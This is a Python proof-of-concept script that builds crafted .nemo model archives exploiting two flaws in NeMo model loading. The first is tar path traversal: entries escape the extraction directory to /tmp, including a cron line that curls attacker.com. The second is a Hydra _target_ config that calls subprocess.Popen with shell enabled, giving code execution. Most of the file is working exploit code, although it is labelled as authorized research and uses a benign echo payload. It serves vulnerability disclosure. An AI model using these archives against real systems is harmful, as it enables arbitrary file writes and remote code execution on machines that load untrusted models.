"""
PoC: NeMo Path Traversal + Hydra _target_ Injection
=====================================================
Crafts malicious .nemo files demonstrating two vulnerabilities:
1. Path Traversal: tar.extract() in model_utils.py without _safe_extract()
2. Hydra Injection: _target_ field in config instantiates arbitrary classes

Usage:
    python craft_malicious_nemo.py                  # Generate both PoCs
    python craft_malicious_nemo.py --type traversal # Path traversal only
    python craft_malicious_nemo.py --type hydra     # Hydra injection only
    python craft_malicious_nemo.py --verify         # Show archive contents

This is for authorized security research only.
"""

import argparse
import io
import os
import tarfile

# Name of the config member every generated archive carries.
MODEL_CONFIG_NAME = "model_config.yaml"


def _ensure_parent_dir(output_path):
    """Create the directory that will hold *output_path* if it is missing."""
    parent = os.path.dirname(output_path)
    # A bare filename has an empty dirname; there is nothing to create then.
    if parent:
        os.makedirs(parent, exist_ok=True)


def _add_member(tar, name, data):
    """Append an in-memory file called *name* with contents *data* to *tar*."""
    info = tarfile.TarInfo(name=name)
    # TarInfo.size defaults to 0; addfile() copies exactly `size` bytes.
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))


def _member_names(archive_path):
    """Return the member names of the uncompressed tar at *archive_path*."""
    with tarfile.open(archive_path, "r:") as tar:
        return tar.getnames()


def _print_written(label, output_path):
    """Print the "written to" banner and the on-disk size of *output_path*."""
    file_size = os.path.getsize(output_path)
    print(f"[+] {label} .nemo written to: {output_path}")
    print(f" Size: {file_size} bytes")
    print()


def craft_path_traversal_nemo(output_path="path_traversal.nemo"):
    """
    Create a .nemo file with path traversal in tar entry names.

    The archive holds a plain ``model_config.yaml`` plus two members whose
    names start with ``../../../../tmp/``. According to the original author's
    analysis, model_utils.load_config() / save_artifacts() call tar.extract()
    without _safe_extract() (which is only used in save_restore_connector.py),
    so such names are written outside the intended directory.

    Args:
        output_path: Where to write the archive. Missing parent directories
            are created.

    Returns:
        The *output_path* that was written.
    """
    # 1. Legitimate model_config.yaml (required for detect_prefix()).
    config_content = (
        b"model:\n"
        b"  name: poc_path_traversal\n"
        b"  target: nemo_test\n"
        b"  class_path: nemo.collections.asr.models.EncDecCTCModel\n"
    )

    # 2. Path traversal entries -- escape the extraction directory.
    #    When load_config calls tar.extract(f"{prefix}{MODEL_CONFIG}", path=tmp)
    #    the prefix from detect_prefix() is "", so it extracts
    #    "model_config.yaml". But save_artifacts extracts arbitrary artifact
    #    paths from the tar, and a crafted artifact path can escape.
    payload = b"PATH_TRAVERSAL_SUCCESSFUL - written outside extraction dir\n"
    payload2 = b"# Malicious cron job\n* * * * * curl http://attacker.com/exfil\n"

    members = (
        (MODEL_CONFIG_NAME, config_content),
        # Traversal via artifact name.
        ("../../../../tmp/nemo_poc_escaped.txt", payload),
        # Additional traversal marker (still lands under /tmp).
        ("../../../../tmp/nemo_poc_cron", payload2),
    )

    _ensure_parent_dir(output_path)
    with tarfile.open(output_path, "w:") as tar:
        for name, data in members:
            _add_member(tar, name, data)

    _print_written("Path traversal", output_path)
    print(" Tar contents:")
    for name in _member_names(output_path):
        escape = " <-- PATH TRAVERSAL" if ".." in name else ""
        print(f" {name}{escape}")
    print()
    print("[!] When loaded by nemo.utils.model_utils.load_config():")
    print(" tar.extract() has NO path validation (_safe_extract not used)")
    print(" Files are written outside the temp extraction directory")
    return output_path


def craft_hydra_injection_nemo(output_path="hydra_injection.nemo"):
    """
    Create a .nemo file with Hydra _target_ injection in config.

    The embedded ``model_config.yaml`` sets ``optim._target_`` to
    ``subprocess.Popen`` with a harmless ``echo`` command. According to the
    original author's analysis, setup_optimization() passes this config to
    hydra.utils.instantiate(), which instantiates whatever importable class
    ``_target_`` names.

    Args:
        output_path: Where to write the archive. Missing parent directories
            are created.

    Returns:
        The *output_path* that was written.
    """
    # Config with malicious _target_ pointing to subprocess.Popen.
    # NOTE(review): the nesting below was reconstructed from a
    # whitespace-collapsed copy of this file -- confirm against the original.
    config_content = (
        b"model:\n"
        b"  name: poc_hydra_injection\n"
        b"  target: nemo_test\n"
        b"  optim:\n"
        b"    _target_: subprocess.Popen\n"
        b"    args:\n"
        b'      - "echo HYDRA_TARGET_INJECTION_SUCCESSFUL"\n'
        b"    shell: true\n"
        b"    sched:\n"
        b"      name: CosineAnnealing\n"
        b"      warmup_steps: 100\n"
    )
    # Dummy weights file so the archive looks like a real .nemo.
    weights = b"\x00" * 64

    _ensure_parent_dir(output_path)
    with tarfile.open(output_path, "w:") as tar:
        _add_member(tar, MODEL_CONFIG_NAME, config_content)
        _add_member(tar, "model_weights.ckpt", weights)

    _print_written("Hydra injection", output_path)
    print(" Tar contents:")
    for name in _member_names(output_path):
        print(f" {name}")
    print()
    print(" Malicious config excerpt:")
    print(" optim:")
    print(" _target_: subprocess.Popen <-- ARBITRARY CLASS INSTANTIATION")
    print(' args: ["echo HYDRA_TARGET_INJECTION_SUCCESSFUL"]')
    print(" shell: true")
    print()
    print("[!] When loaded by NeMo and setup_optimization() is called:")
    print(" hydra.utils.instantiate({_target_: 'subprocess.Popen', ...})")
    print(" -> Instantiates subprocess.Popen with attacker args -> RCE")
    return output_path


def _verify_archive(path):
    """Print each member of *path* and preview the first 10 config lines."""
    print(f"=== Verifying {path} ===")
    with tarfile.open(path, "r:") as tar:
        for member in tar.getmembers():
            print(f" {member.name} ({member.size} bytes)")
            if member.name != MODEL_CONFIG_NAME:
                continue
            # extractfile() only reads the member in memory; nothing is
            # written to disk, so the traversal names are never followed.
            extracted = tar.extractfile(member)
            if extracted is None:
                continue
            with extracted:
                text = extracted.read().decode()
            print(" Config preview:")
            for line in text.split("\n")[:10]:
                print(f" {line}")
    print()


def main():
    """Parse CLI arguments, generate the requested PoC archives, and
    optionally list their contents (``--verify``)."""
    parser = argparse.ArgumentParser(description="NeMo PoC generator")
    parser.add_argument("--type", choices=["traversal", "hydra", "both"],
                        default="both", help="Which PoC to generate")
    parser.add_argument("--verify", action="store_true",
                        help="Show archive contents after generation")
    parser.add_argument("--output-dir", default=".", help="Output directory")
    args = parser.parse_args()

    # (selector, generator, filename) in the order the archives are produced.
    generators = (
        ("traversal", craft_path_traversal_nemo, "path_traversal.nemo"),
        ("hydra", craft_hydra_injection_nemo, "hydra_injection.nemo"),
    )

    paths = []
    for selector, generate, filename in generators:
        if args.type in (selector, "both"):
            paths.append(generate(os.path.join(args.output_dir, filename)))
            print()

    if args.verify:
        for path in paths:
            _verify_archive(path)


if __name__ == "__main__":
    main()